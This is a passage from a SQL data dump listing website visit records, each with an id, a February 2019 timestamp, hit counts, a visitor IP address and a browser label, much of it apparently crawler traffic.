0,'66.249.66.222','chrome'),(387994,1550560130,1,1,0,0,'46.229.168.135','other'),(387995,1550560449,1,1,0,0,'54.36.149.70','other'),(387996,1550560771,1,1,0,0,'46.229.168.138','other'),(387997,1550561120,1,1,0,0,'92.113.180.6','chrome'),(387998,1550561398,1,1,0,0,'62.221.40.186','chrome'),(387999,1550561507,1,1,0,0,'95.163.255.98','other'),(388000,1550561564,1,1,0,0,'66.249.66.44','chrome'),(388001,1550561565,1,1,0,0,'54.36.148.185','other'),(388002,1550561704,1,1,0,0,'8.29.198.27','other'),(388003,1550562039,1,1,0,0,'178.94.27.197','chrome'),(388004,1550562091,1,1,0,0,'54.36.148.33','other'),(388005,1550562243,1,1,0,0,'54.36.149.87','other'),(388006,1550562425,2,2,0,0,'91.196.178.161','chrome'),(388007,1550562506,1,1,0,0,'216.244.66.241','other'),(388008,1550562565,1,1,0,0,'95.163.255.99','other'),(388009,1550562620,1,1,0,0,'54.36.148.108','other'),(388010,1550562722,1,1,0,0,'54.36.149.69','other'),(388011,1550563027,1,1,0,0,'95.163.255.175','other'),(388012,1550563029,1,1,0,0,'95.163.255.156','other'),(388013,1550563211,1,1,0,0,'54.36.148.245','other'),(388014,1550563250,1,1,0,0,'8.29.198.25','other'),(388015,1550563345,1,1,0,0,'80.91.178.106','chrome'),(388016,1550563425,1,1,0,0,'54.36.148.196','other'),(388017,1550564068,1,1,0,0,'207.46.13.96','other'),(388018,1550564457,1,1,0,0,'46.229.168.138','other'),(388019,1550564602,1,1,0,0,'54.36.148.79','other'),(388020,1550564621,1,1,0,0,'216.244.66.241','other'),(388021,1550564656,1,1,0,0,'91.196.178.189','chrome'),(388022,1550564823,1,1,0,0,'91.196.178.97','chrome'),(388023,1550564948,1,1,0,0,'54.36.148.198','other'),(388024,1550565115,1,1,0,0,'54.36.149.56','other'),(388025,1550565157,1,1,0,0,'5.45.207.79','other'),(388026,1550565305,1,1,0,0,'66.249.66.44','chrome'),(388027,1550565337,1,1,0,0,'54.36.148.208','other'),(388028,1550565588,1,1,0,0,'95.133.1.1','chrome'),(388029,1550565616,1,1,0,0,'54.36.148.26','other'),(388030,1550566086,1,1,0,0,'46.229.168.152','other'),(388031,1550566378,2,2,0,0,'66.249.66.154','chrome'),(388032,1550566461,1,1,0,0,'46.229.168.149','other'),(388033,1550566518,1,1,0,0,'178.92.198.223','opera'),(388034,1550566531,2,2,0,0,'95.163.255.150','other'),(388035,1550566794,1,1,0,0,'66.249.66.42','chrome'),(388036,1550566833,1,1,0,0,'54.36.149.85','other'),(388037,1550567063,1,1,0,0,'54.36.148.242','other'),(388038,1550567460,1,1,0,0,'54.36.148.122','other'),(388039,1550567511,1,1,0,0,'91.221.211.232','chrome'),(388040,1550567618,1,1,0,0,'94.100.221.234','chrome'),(388041,1550567620,1,1,0,0,'54.36.148.185','other'),(388042,1550567779,1,1,0,0,'157.55.39.239','other'),(388043,1550567788,1,1,0,0,'178.154.244.11','other'),(388044,1550567874,1,1,0,0,'95.163.255.162','other'),(388045,1550567881,1,1,0,0,'95.163.255.178','other'),(388046,1550567965,1,1,0,0,'216.244.66.241','other'),(388047,1550568293,1,1,0,0,'94.178.97.142','chrome'),(388048,1550568416,1,1,0,0,'54.36.149.73','other'),(388049,1550568442,1,1,0,0,'195.24.145.182','chrome'),(388050,1550568661,1,1,0,0,'54.36.148.123','other'),(388051,1550568980,3,3,0,0,'66.249.66.152','chrome'),(388052,1550569354,1,1,0,0,'54.36.148.40','other'),(388053,1550569368,1,1,0,0,'54.36.148.233','other'),(388054,1550569464,1,1,0,0,'54.36.149.107','other'),(388055,1550569677,1,1,0,0,'66.249.66.156','chrome'),(388056,1550569959,1,1,0,0,'54.36.148.197','other'),(388057,1550570134,2,2,0,0,'54.36.148.219','other'),(388058,1550570206,1,1,0,0,'91.196.178.131','chrome'),(388059,1550570212,1,1,0,0,'54.36.148.32','other'),(388060,1550570527,1,1,0,0,'54.36.148.245','other'),(388061,1550570811,1,1,0,0,'66.249.66.154','chrome'),(388062,1550571228,1,1,0,0,'54.36.149.39','other'),(388063,1550571439,1,1,0,0,'92.112.125.184','chrome'),(388064,1550571442,1,1,0,0,'94.179.2.89','chrome'),(388065,1550571557,1,1,0,0,'54.36.148.236','other'),(388066,1550571628,1,1,0,0,'40.77.167.85','other'),(388067,1550571963,1,1,0,0,'54.36.148.121','other'),(388068,1550571967,1,1,0,0,'54.36.148.40','other'),(388069,1550572397,1,1,0,0,'54.36.148.104','other'),(388070,1550572495,1,1,0,0,'54.36.148.146','other'),(388071,1550572552,1,1,0,0,'8.29.198.27','other'),(388072,1550572687,2,2,0,0,'216.244.66.241','other'),(388073,1550573528,1,1,0,0,'46.229.168.152','other'),(388074,1550573560,1,1,0,0,'95.163.255.185','other'),(388075,1550573651,1,1,0,0,'54.36.148.161','other'),(388076,1550573717,1,1,0,0,'54.36.148.191','other'),(388077,1550573809,1,1,0,0,'40.77.167.165','other'),(388078,1550573935,1,1,0,0,'66.249.66.40','chrome'),(388079,1550573937,1,1,0,0,'94.27.8.44','chrome'),(388080,1550574053,1,1,0,0,'95.163.255.97','other'),(388081,1550574055,1,1,0,0,'54.36.148.49','other'),(388082,1550574098,1,1,0,0,'8.29.198.25','other'),(388083,1550574499,1,1,0,0,'95.163.255.166','other'),(388084,1550574560,1,1,0,0,'37.53.158.40','chrome'),(388085,1550575075,1,1,0,0,'54.36.148.194','other'),(388086,1550575479,1,1,0,0,'54.36.149.22','other'),(388087,1550575818,1,1,0,0,'46.229.168.135','other'),(388088,1550575860,1,1,0,0,'66.249.66.156','chrome'),(388089,1550576195,1,1,0,0,'207.46.13.229','other'),(388090,1550576289,1,1,0,0,'54.36.149.90','other'),(388091,1550576490,1,1,0,0,'54.36.148.225','other'),(388092,1550576841,1,1,0,0,'54.36.148.238','other'),(388093,1550577125,1,1,0,0,'54.36.148.60','other'),(388094,1550577457,1,1,0,0,'54.36.148.12','other'),(388095,1550577811,1,1,0,0,'54.36.148.89','other'),(388096,1550578271,1,1,0,0,'54.36.148.127','other'),(388097,1550578343,1,1,0,0,'54.36.148.33','other'),(388098,1550578348,1,1,0,0,'54.36.149.58','other'),(388099,1550578568,1,1,0,0,'54.36.148.154','other'),(388100,1550578632,1,1,0,0,'95.163.255.99','other'),(388101,1550578711,5,5,0,0,'216.244.66.241','other'),(388102,1550578797,1,1,0,0,'91.196.178.94','chrome'),(388103,1550578969,1,1,0,0,'40.77.167.77','other'),(388104,1550579320,1,1,0,0,'54.36.148.23','other'),(388105,1550579553,1,1,0,0,'54.36.148.208','other'),(388106,1550579576,1,1,0,0,'54.36.148.234','other'),(388107,1550579710,1,1,0,0,'91.124.182.170','firefox'),(388108,1550579774,1,1,0,0,'92.113.29.250','chrome'),(388109,1550579804,1,1,0,0,'81.163.126.140','chrome'),(388110,1550579928,1,1,0,0,'94.178.120.79','firefox'),(388111,1550580316,1,1,0,0,'95.163.255.178','other'),(388112,1550580557,1,1,0,0,'91.196.178.94','chrome'),(388113,1550580759,1,1,0,0,'54.36.149.59','other'),(388114,1550581147,1,1,0,0,'216.244.66.241','other'),(388115,1550581185,1,1,0,0,'207.46.13.237','other'),(388116,1550581247,1,1,0,0,'178.154.244.11','other'),(388117,1550581271,1,1,0,0,'66.249.66.40','chrome'),(388118,1550581307,1,1,0,0,'54.36.148.97','other'),(388119,1550581358,1,1,0,0,'40.77.167.77','other'),(388120,1550581630,1,1,0,0,'46.229.168.152','other'),(388121,1550581665,1,1,0,0,'91.124.174.165','chrome'),(388122,1550582140,1,1,0,0,'46.229.168.142','other'),(388123,1550582224,1,1,0,0,'46.229.168.150','other'),(388124,1550582461,1,1,0,0,'46.211.70.253','other'),(388125,1550582554,1,1,0,0,'46.166.186.231','other'),(388126,1550582608,1,1,0,0,'54.36.148.245','other'),(388127,1550582759,1,1,0,0,'91.196.178.94','chrome'),(388128,1550582902,1,1,0,0,'91.124.182.170','firefox'),(388129,1550583020,1,1,0,0,'54.36.148.113','other'),(388130,1550583037,1,1,0,0,'54.36.148.181','other'),(388131,1550583204,1,1,0,0,'95.132.36.101','firefox'),(388132,1550583287,1,1,0,0,'54.36.149.44','other'),(388133,1550583438,1,1,0,0,'8.29.198.27','other'),(388134,1550583449,1,1,0,0,'54.36.148.220','other'),(388135,1550583472,1,1,0,0,'54.36.148.251','other'),(388136,1550583571,1,1,0,0,'37.53.123.48','chrome'),(388137,1550583697,1,1,0,0,'54.36.148.30','other'),(388138,1550583791,1,1,0,0,'54.36.148.94','other'),(388139,1550583853,1,1,0,0,'216.244.66.241','other'),(388140,1550583856,1,1,0,0,'54.36.149.91','other'),(388141,1550584018,1,1,0,0,'54.36.148.118','other'),(388142,1550584060,1,1,0,0,'54.36.148.156','other'),(388143,1550584107,3,3,0,0,'91.124.182.170','firefox'),(388144,1550584216,1,1,0,0,'207.46.13.229','other'),(388145,1550584276,1,1,0,0,'95.163.255.97','other'),(388146,1550584320,1,1,0,0,'46.229.168.139','other'),(388147,1550584397,1,1,0,0,'54.36.149.98','other'),(388148,1550584546,1,1,0,0,'46.166.186.206','other'),(388149,1550584708,1,1,0,0,'54.36.148.134','other'),(388150,1550584741,1,1,0,0,'95.163.255.184','other'),(388151,1550584749,1,1,0,0,'54.36.149.78','other'),(388152,1550584791,1,1,0,0,'54.36.149.22','other'),(388153,1550584919,1,1,0,0,'66.249.66.156','chrome'),(388154,1550584942,1,1,0,0,'8.29.198.26','other'),(388155,1550584949,1,1,0,0,'207.46.13.240','other'),(388156,1550584986,1,1,0,0,'54.36.149.4','other'),(388157,1550585040,1,1,0,0,'95.163.255.168','other'),(388158,1550585053,1,1,0,0,'95.163.255.189','other'),(388159,1550585110,1,1,0,0,'46.229.168.148','other'),(388160,1550585227,1,1,0,0,'66.249.66.90','chrome'),(388161,1550585675,1,1,0,0,'91.196.178.87','chrome'),(388162,1550586025,1,1,0,0,'54.36.148.250','other'),(388163,1550586236,1,1,0,0,'54.36.149.76','other'),(388164,1550586582,3,3,0,0,'216.244.66.241','other'),(388165,1550586653,1,1,0,0,'54.36.148.220','other'),(388166,1550586715,1,1,0,0,'54.36.148.121','other'),(388167,1550586780,2,2,0,0,'207.46.13.229','other'),(388168,1550586822,1,1,0,0,'66.249.66.92','chrome'),(388169,1550586881,1,1,0,0,'91.124.174.165','chrome'),(388170,1550586894,1,1,0,0,'31.43.25.211','chrome'),(388171,1550587285,1,1,0,0,'66.249.66.90','chrome'),(388172,1550587327,3,3,0,0,'66.249.66.91','chrome'),(388173,1550587666,1,1,0,0,'180.76.15.141','other'),(388174,1550587668,2,2,0,0,'54.36.149.22','other'),(388175,1550587804,1,1,0,0,'54.36.148.245','other'),(388176,1550587811,1,1,0,0,'95.133.45.56','chrome'),(388177,1550587847,1,1,0,0,'54.36.148.222','other'),(388178,1550587917,1,1,0,0,'91.196.178.94','chrome'),(388179,1550588067,1,1,0,0,'94.154.218.157','chrome'),(388180,1550588270,1,1,0,0,'54.36.148.237','other'),(388181,1550588329,2,2,0,0,'54.36.148.32','other'),(388182,1550588390,1,1,0,0,'54.36.148.129','other'),(388183,1550588878,2,2,0,0,'188.163.16.144','chrome'),(388184,1550588888,1,1,0,0,'95.163.255.187','other'),(388185,1550588893,1,1,0,0,'95.163.255.150','other'),(388186,1550588951,1,1,0,0,'54.36.148.205','other'),(388187,1550588975,1,1,0,0,'66.249.66.92','chrome'),(388188,1550589102,1,1,0,0,'54.36.148.111','other'),(388189,1550589294,1,1,0,0,'54.36.148.129','other'),(388190,1550589435,1,1,0,0,'216.244.66.241','other'),(388191,1550589711,1,1,0,0,'54.36.148.197','other'),(388192,1550589930,1,1,0,0,'46.229.168.135','other'),(388193,1550590128,1,1,0,0,'54.36.149.42','other'),(388194,1550590300,1,1,0,0,'46.229.168.148','other'),(388195,1550590414,1,1,0,0,'54.36.148.50','other'),(388196,1550590794,1,1,0,0,'46.229.168.137','other'),(388197,1550591101,1,1,0,0,'91.196.178.70','firefox'),(388198,1550591189,1,1,0,0,'54.36.148.169','other'),(388199,1550591266,1,1,0,0,'95.163.255.93','other'),(388200,1550591353,1,1,0,0,'207.46.13.247','other'),(388201,1550591839,1,1,0,0,'54.36.149.90','other'),(388202,1550591898,1,1,0,0,'66.249.66.152','chrome'),(388203,1550592288,1,1,0,0,'66.249.66.154','chrome'),(388204,1550592402,2,2,0,0,'216.244.66.241','other'),(388205,1550593350,1,1,0,0,'157.55.39.189','other'),(388206,1550593428,1,1,0,0,'180.76.15.12','other'),(388207,1550593624,1,1,0,0,'54.36.149.54','other'),(388208,1550594240,1,1,0,0,'66.249.66.42','chrome'),(388209,1550594325,1,1,0,0,'8.29.198.25','other'),(388210,1550594510,1,1,0,0,'54.36.148.166','other'),(388211,1550594769,1,1,0,0,'54.36.149.89','other'),(388212,1550595066,1,1,0,0,'54.36.148.193','other'),(388213,1550595077,1,0,1,0,'66.249.66.152',''),(388214,1550595080,1,1,0,0,'46.229.168.144','other'),(388215,1550595156,1,1,0,0,'54.36.149.10','other'),(388216,1550595326,1,1,0,0,'54.36.148.167','other'),(388217,1550595505,1,1,0,0,'54.36.148.57','other'),(388218,1550595799,1,1,0,0,'8.29.198.25','other'),(388219,1550595970,1,1,0,0,'54.36.148.226','other'),(388220,1550596266,1,1,0,0,'54.36.149.79','other'),(388221,1550596379,1,1,0,0,'54.36.148.50','other'),(388222,1550596388,1,1,0,0,'54.36.148.101','other'),(388223,1550597052,1,1,0,0,'40.77.167.218','other'),(388224,1550597372,1,1,0,0,'46.211.115.19','chrome'),(388225,1550597409,3,3,0,0,'216.244.66.241','other'),(388226,1550597840,1,1,0,0,'91.193.128.228','chrome'),(388227,1550597944,1,1,0,0,'54.36.149.12','other'),(388228,1550598021,1,1,0,0,'46.229.168.146','other'),(388229,1550598207,1,1,0,0,'54.36.149.96','other'),(388230,1550598689,1,1,0,0,'157.55.39.189','other'),(388231,1550599272,1,1,0,0,'54.36.148.153','other'),(388232,1550599308,1,1,0,0,'54.36.148.174','other'),(388233,1550599713,1,1,0,0,'54.36.148.113','other'),(388234,1550599715,3,3,0,0,'216.244.66.241','other'),(388235,1550599750,1,1,0,0,'66.249.66.156','chrome'),(388236,1550599817,1,1,0,0,'66.249.66.152','chrome'),(388237,1550599940,1,1,0,0,'54.36.148.23','other'),(388238,1550600168,1,1,0,0,'54.36.148.195','other'),(388239,1550600179,1,1,0,0,'95.163.255.165','other'),(388240,1550600234,1,1,0,0,'130.180.209.136','chrome'),(388241,1550600751,1,1,0,0,'178.93.158.20','chrome'),(388242,1550600767,1,1,0,0,'157.55.39.218','other'),(388243,1550600810,1,1,0,0,'66.249.66.156','chrome'),(388244,1550600977,1,1,0,0,'54.36.148.250','other'),(388245,1550601484,1,1,0,0,'40.77.167.218','other'),(388246,1550601540,1,1,0,0,'54.36.148.229','other'),(388247,1550601553,1,1,0,0,'66.249.66.152','chrome'),(388248,1550601607,1,1,0,0,'54.36.148.22','other'),(388249,1550601670,1,1,0,0,'95.163.255.189','other'),(388250,1550601750,1,1,0,0,'176.113.170.104','chrome'),(388251,1550601836,1,1,0,0,'95.163.255.165','other'),(388252,1550601843,1,1,0,0,'95.163.255.177','other'),(388253,1550602357,1,1,0,0,'54.36.149.101','other'),(388254,1550602667,1,0,1,0,'66.249.66.154',''),(388255,1550602763,1,1,0,0,'95.163.255.97','other'),(388256,1550603007,1,1,0,0,'54.36.148.241','other'),(388257,1550603356,1,1,0,0,'66.249.66.40','chrome'),(388258,1550603421,1,1,0,0,'54.36.148.138','other'),(388259,1550603448,1,1,0,0,'91.209.11.236','other'),(388260,1550603790,1,1,0,0,'54.36.148.178','other'),(388261,1550603814,1,1,0,0,'157.55.39.189','other'),(388262,1550603914,1,1,0,0,'54.36.148.230','other'),(388263,1550604094,1,1,0,0,'54.36.149.1','other'),(388264,1550604243,1,1,0,0,'54.36.149.25','other'),(388265,1550604323,1,1,0,0,'40.77.167.218','other'),(388266,1550604336,1,1,0,0,'54.36.148.84','other'),(388267,1550604381,1,1,0,0,'66.249.66.154','chrome'),(388268,1550604823,1,1,0,0,'54.36.149.60','other'),(388269,1550604888,1,1,0,0,'54.36.148.207','other'),(388270,1550605037,1,1,0,0,'54.36.148.25','other'),(388271,1550605194,1,1,0,0,'8.29.198.27','other'),(388272,1550605319,1,1,0,0,'157.55.39.181','other'),(388273,1550605517,1,1,0,0,'54.36.148.12','other'),(388274,1550605684,1,1,0,0,'46.229.168.153','other'),(388275,1550605928,1,1,0,0,'40.77.167.218','other'),(388276,1550606042,1,1,0,0,'157.55.39.218','other'),(388277,1550606232,2,2,0,0,'66.249.66.152','chrome'),(388278,1550606383,1,1,0,0,'109.201.154.219','other'),(388279,1550606461,1,1,0,0,'54.36.148.103','other'),(388280,1550606655,1,1,0,0,'8.29.198.26','other'),(388281,1550606989,1,1,0,0,'54.36.148.180','other'),(388282,1550607016,1,1,0,0,'157.55.39.189','other'),(388283,1550607044,1,1,0,0,'95.163.255.93','other'),(388284,1550607088,1,1,0,0,'46.229.168.133','other'),(388285,1550607122,1,1,0,0,'95.163.255.195','other'),(388286,1550607159,1,1,0,0,'54.36.149.24','other'),(388287,1550607309,1,1,0,0,'54.36.148.231','other'),(388288,1550607553,1,1,0,0,'216.244.66.241','other'),(388289,1550607737,1,1,0,0,'54.36.148.214','other'),(388290,1550607803,1,1,0,0,'207.46.13.247','other'),(388291,1550608466,1,1,0,0,'91.196.178.180','chrome'),(388292,1550608477,1,1,0,0,'66.249.66.156','chrome'),(388293,1550608908,1,1,0,0,'54.36.149.103','other'),(388294,1550609020,1,1,0,0,'66.249.66.42','chrome'),(388295,1550609254,1,1,0,0,'54.36.148.32','other'),(388296,1550609372,1,1,0,0,'46.229.168.136','other'),(388297,1550609736,1,1,0,0,'54.36.148.188','other'),(388298,1550609810,1,1,0,0,'54.36.148.124','other'),(388299,1550609812,1,1,0,0,'207.46.13.177','other'),(388300,1550609964,1,1,0,0,'54.36.149.102','other'),(388301,1550609979,1,1,0,0,'54.36.148.179','other'),(388302,1550610437,1,1,0,0,'54.36.148.15','other'),(388303,1550610572,1,1,0,0,'54.36.148.169','other'),(388304,1550610732,1,1,0,0,'216.244.66.241','other'),(388305,1550610768,1,1,0,0,'91.209.11.236','other'),(388306,1550610805,1,1,0,0,'54.36.148.93','other'),(388307,1550611058,1,1,0,0,'207.46.13.176','other'),(388308,1550611360,1,1,0,0,'46.229.168.144','other'),(388309,1550611445,1,1,0,0,'54.36.149.58','other'),(388310,1550611446,1,1,0,0,'54.36.148.194','other'),(388311,1550611735,1,1,0,0,'54.36.149.6','other'),(388312,1550612139,1,1,0,0,'66.249.66.44','chrome'),(388313,1550612141,1,1,0,0,'207.46.13.175','other'),(388314,1550612183,2,2,0,0,'66.249.66.152','chrome'),(388315,1550612497,1,1,0,0,'91.196.178.180','chrome'),(388316,1550612504,1,1,0,0,'54.36.148.94','other'),(388317,1550613201,4,4,0,0,'216.244.66.241','other'),(388318,1550613463,1,1,0,0,'54.36.148.185','other'),(388319,1550613749,1,1,0,0,'54.36.148.196','other'),(388320,1550613905,1,1,0,0,'66.249.66.156','chrome'),(388321,1550614134,1,1,0,0,'54.36.149.102','other'),(388322,1550614255,2,2,0,0,'207.46.13.175','other'),(388323,1550614348,1,1,0,0,'46.229.168.136','other'),(388324,1550615190,1,1,0,0,'54.36.148.13','other'),(388325,1550615542,1,1,0,0,'46.229.168.144','other'),(388326,1550615880,1,1,0,0,'134.73.199.154','chrome'),(388327,1550615985,1,1,0,0,'216.244.66.241','other'),(388328,1550616057,1,1,0,0,'8.29.198.26','other'),(388329,1550616212,1,1,0,0,'54.36.148.21','other'),(388330,1550616336,1,1,0,0,'54.36.148.224','other'),(388331,1550616347,1,1,0,0,'66.249.66.44','chrome'),(388332,1550616529,1,1,0,0,'54.36.148.25','other'),(388333,1550616804,1,1,0,0,'66.249.66.152','chrome'),(388334,1550617066,1,1,0,0,'207.46.13.175','other'),(388335,1550617074,1,1,0,0,'54.36.148.70','other'),(388336,1550617226,1,1,0,0,'95.163.255.196','other'),(388337,1550617507,1,1,0,0,'8.29.198.27','other'),(388338,1550617729,1,1,0,0,'54.36.149.95','other'),(388339,1550617852,1,1,0,0,'54.36.148.20','other'),(388340,1550617862,1,1,0,0,'54.36.148.203','other'),(388341,1550617863,2,2,0,0,'66.249.66.154','chrome'),(388342,1550617972,1,1,0,0,'54.36.148.198','other'),(388343,1550618289,1,1,0,0,'95.163.255.93','other'),(388344,1550618695,1,1,0,0,'54.36.148.194','other'),(388345,1550618704,1,1,0,0,'207.46.13.178','other'),(388346,1550618743,1,1,0,0,'216.244.66.241','other'),(388347,1550618991,1,1,0,0,'54.36.148.49','other'),(388348,1550619197,1,1,0,0,'91.204.114.165','chrome'),(388349,1550619324,1,1,0,0,'207.46.13.175','other'),(388350,1550619540,1,1,0,0,'46.229.168.150','other'),(388351,1550619599,1,1,0,0,'66.249.66.156','chrome'),(388352,1550619656,1,1,0,0,'54.36.148.226','other'),(388353,1550619721,1,1,0,0,'157.55.39.129','other'),(388354,1550619746,1,1,0,0,'66.249.66.44','chrome'),(388355,1550619801,1,1,0,0,'95.163.255.94','other'),(388356,1550619958,1,1,0,0,'95.163.255.154','other'),(388357,1550620056,1,1,0,0,'46.229.168.134','other'),(388358,1550620180,1,1,0,0,'66.249.66.154','chrome'),(388359,1550620561,1,1,0,0,'54.36.149.89','other'),(388360,1550620581,1,1,0,0,'46.229.168.132','other'),(388361,1550621074,1,1,0,0,'54.36.149.39','other'),(388362,1550621248,1,1,0,0,'66.249.66.154','chrome'),(388363,1550621277,1,1,0,0,'66.249.66.152','chrome'),(388364,1550621382,1,1,0,0,'54.36.148.139','other'),(388365,1550621474,1,1,0,0,'54.36.149.47','other'),(388366,1550621566,1,1,0,0,'178.255.215.94','other'),(388367,1550621681,1,1,0,0,'54.36.148.86','other'),(388368,1550621828,1,1,0,0,'216.244.66.241','other'),(388369,1550622511,1,1,0,0,'54.36.148.146','other'),(388370,1550622853,2,2,0,0,'66.249.66.62','chrome'),(388371,1550622912,1,1,0,0,'66.249.66.136','chrome'),(388372,1550623089,1,1,0,0,'207.46.13.149','other'),(388373,1550623231,1,1,0,0,'54.36.148.137','other'),(388374,1550623291,1,1,0,0,'54.36.148.243','other'),(388375,1550623408,1,1,0,0,'54.36.149.75','other'),(388376,1550623678,1,1,0,0,'54.36.148.125','other'),(388377,1550623879,1,1,0,0,'46.229.168.150','other'),(388378,1550623957,1,1,0,0,'54.36.148.121','other'),(388379,1550623996,1,1,0,0,'54.36.148.135','other'),(388380,1550624020,3,3,0,0,'216.244.66.241','other'),(388381,1550624102,1,1,0,0,'54.36.148.126','other'),(388382,1550624242,1,1,0,0,'54.36.148.167','other'),(388383,1550624249,1,1,0,0,'46.229.168.145','other'),(388384,1550624318,1,1,0,0,'209.17.97.34','other'),(388385,1550624387,1,1,0,0,'95.163.255.157','other'),(388386,1550624389,1,1,0,0,'95.163.255.164','other'),(388387,1550624514,1,1,0,0,'54.36.148.232','other'),(388388,1550624684,1,1,0,0,'54.36.149.9','other'),(388389,1550624892,1,1,0,0,'66.249.66.138','chrome'),(388390,1550625332,1,1,0,0,'66.249.66.134','chrome'),(388391,1550625472,1,1,0,0,'95.163.255.99','other'),(388392,1550625592,1,1,0,0,'54.36.148.241','other'),(388393,1550625611,1,1,0,0,'95.163.255.163','other'),(388394,1550625737,1,1,0,0,'54.36.148.144','other'),(388395,1550626189,1,1,0,0,'54.36.148.197','other'),(388396,1550626384,1,1,0,0,'66.249.66.138','chrome'),(388397,1550626406,1,1,0,0,'54.36.148.100','other'),(388398,1550626446,1,1,0,0,'46.229.168.129','other'),(388399,1550626520,1,1,0,0,'54.36.148.154','other'),(388400,1550626777,1,1,0,0,'180.76.15.156','other'),(388401,1550626910,1,1,0,0,'8.29.198.26','other'),(388402,1550626936,1,1,0,0,'141.8.142.103','other'),(388403,1550626968,1,1,0,0,'157.55.39.179','other'),(388404,1550627113,2,2,0,0,'66.249.66.136','chrome'),(388405,1550627132,1,1,0,0,'54.36.148.158','other'),(388406,1550627303,1,1,0,0,'46.166.190.150','other'),(388407,1550628357,1,1,0,0,'8.29.198.27','other'),(388408,1550628779,1,1,0,0,'46.229.168.145','other'),(388409,1550628835,1,1,0,0,'66.249.66.134','chrome'),(388410,1550628914,1,1,0,0,'54.36.148.121','other'),(388411,1550629033,1,1,0,0,'54.36.148.154','other'),(388412,1550629111,2,2,0,0,'157.55.39.179','other'),(388413,1550629159,1,1,0,0,'54.36.148.246','other'),(388414,1550629201,2,2,0,0,'216.244.66.241','other'),(388415,1550629857,1,1,0,0,'66.249.66.136','chrome'),(388416,1550630026,1,1,0,0,'95.163.255.168','other'),(388417,1550630172,1,1,0,0,'40.77.167.22','other'),(388418,1550630200,1,1,0,0,'54.36.148.129','other'),(388419,1550630564,1,1,0,0,'54.36.149.4','other'),(388420,1550630571,1,1,0,0,'54.36.148.208','other'),(388421,1550630682,1,1,0,0,'54.36.148.126','other'),(388422,1550630778,1,1,0,0,'54.36.148.63','other'),(388423,1550630854,1,1,0,0,'54.36.148.103','other'),(388424,1550631024,1,1,0,0,'46.229.168.132','other'),(388425,1550631049,1,1,0,0,'66.249.66.62','chrome'),(388426,1550631570,1,1,0,0,'54.36.148.97','other'),(388427,1550631619,1,1,0,0,'180.76.15.22','other'),(388428,1550631728,1,1,0,0,'40.77.167.22','other'),(388429,1550631879,2,2,0,0,'216.244.66.241','other'),(388430,1550631925,1,1,0,0,'66.249.66.138','chrome'),(388431,1550632027,1,1,0,0,'66.249.66.134','chrome'),(388432,1550632208,1,1,0,0,'54.36.148.203','other'),(388433,1550632556,1,1,0,0,'54.36.148.106','other'),(388434,1550632950,1,1,0,0,'40.77.167.103','other'),(388435,1550633205,1,1,0,0,'54.36.149.40','other'),(388436,1550633291,1,1,0,0,'66.249.66.58','chrome'),(388437,1550633374,1,1,0,0,'54.36.148.142','other'),(388438,1550633665,1,1,0,0,'66.249.66.134','chrome'),(388439,1550634119,11,11,0,0,'167.86.70.144','other'),(388440,1550634700,1,1,0,0,'95.163.255.175','other'),(388441,1550634790,1,1,0,0,'54.36.148.17','other'),(388442,1550634896,1,1,0,0,'54.36.148.201','other'),(388443,1550635226,1,1,0,0,'40.77.167.22','other'),(388444,1550635288,1,1,0,0,'66.249.66.138','chrome'),(388445,1550635408,1,1,0,0,'54.36.148.203','other'),(388446,1550635426,1,1,0,0,'54.36.149.44','other'),(388447,1550635570,1,1,0,0,'54.36.148.145','other'),(388448,1550635715,1,1,0,0,'66.249.66.134','chrome'),(388449,1550635773,1,1,0,0,'178.154.244.11','other'),(388450,1550635957,1,1,0,0,'66.249.66.136','chrome'),(388451,1550635991,1,1,0,0,'95.163.255.92','other'),(388452,1550636331,25,25,0,0,'167.86.70.144','other'),(388453,1550636524,1,1,0,0,'95.163.255.168','other'),(388454,1550636697,1,1,0,0,'54.36.148.164','other'),(388455,1550636980,1,1,0,0,'54.36.149.64','other'),(388456,1550637031,1,1,0,0,'54.36.148.16','other'),(388457,1550637034,1,1,0,0,'95.163.255.93','other'),(388458,1550637113,1,1,0,0,'95.163.255.170','other'),(388459,1550637454,1,1,0,0,'95.163.255.99','other'),(388460,1550637647,1,1,0,0,'54.36.148.48','other'),(388461,1550637771,1,1,0,0,'8.29.198.27','other'),(388462,1550637810,1,1,0,0,'66.249.66.60','chrome'),(388463,1550638069,1,0,1,0,'66.249.66.136',''),(388464,1550638099,1,1,0,0,'54.36.149.46','other'),(388465,1550638367,1,1,0,0,'54.36.149.65','other'),(388466,1550638435,2,2,0,0,'18.237.228.249','chrome'),(388467,1550638663,1,1,0,0,'46.229.168.141','other'),(388468,1550639070,1,1,0,0,'66.249.66.138','chrome'),(388469,1550639207,1,1,0,0,'8.29.198.25','other'),(388470,1550639841,1,1,0,0,'157.55.39.157','other'),(388471,1550639942,1,1,0,0,'157.55.39.96','other'),(388472,1550640235,1,1,0,0,'54.36.148.166','other'),(388473,1550640286,1,1,0,0,'54.36.149.31','other'),(388474,1550640530,1,1,0,0,'54.36.149.96','other'),(388475,1550640692,1,1,0,0,'54.36.148.167','other'),(388476,1550640765,1,1,0,0,'46.229.168.133','other'),(388477,1550640888,1,1,0,0,'216.244.66.241','other'),(388478,1550640931,1,1,0,0,'54.36.148.249','other'),(388479,1550641119,1,1,0,0,'54.36.148.26','other'),(388480,1550641221,1,1,0,0,'54.36.148.63','other'),(388481,1550641604,1,1,0,0,'95.163.255.98','other'),(388482,1550641712,1,1,0,0,'54.36.149.92','other'),(388483,1550641849,1,1,0,0,'66.249.66.134','chrome'),(388484,1550641935,1,1,0,0,'54.36.148.232','other'),(388485,1550642407,3,3,0,0,'216.244.66.241','other'),(388486,1550642801,1,1,0,0,'54.36.148.251','other'),(388487,1550643052,1,1,0,0,'54.36.148.240','other'),(388488,1550643361,1,1,0,0,'185.220.102.8','other'),(388489,1550643506,1,1,0,0,'95.163.255.197','other'),(388490,1550643585,1,1,0,0,'216.244.66.241','other'),(388491,1550643701,1,0,1,0,'66.249.66.138',''),(388492,1550643821,2,2,0,0,'91.196.178.94','chrome'),(388493,1550643962,1,1,0,0,'91.196.177.46','chrome'),(388494,1550644090,1,1,0,0,'91.196.178.83','firefox'),(388495,1550644111,1,1,0,0,'91.196.178.71','firefox'),(388496,1550644202,1,1,0,0,'91.196.178.130','firefox'),(388497,1550644233,1,1,0,0,'60.191.38.77','firefox'),(388498,1550644284,1,1,0,0,'91.196.178.161','chrome'),(388499,1550644325,1,1,0,0,'54.36.149.41','other'),(388500,1550644346,1,1,0,0,'66.249.66.138','chrome'),(388501,1550644348,1,1,0,0,'54.36.148.69','other'),(388502,1550644352,1,1,0,0,'54.36.149.24','other'),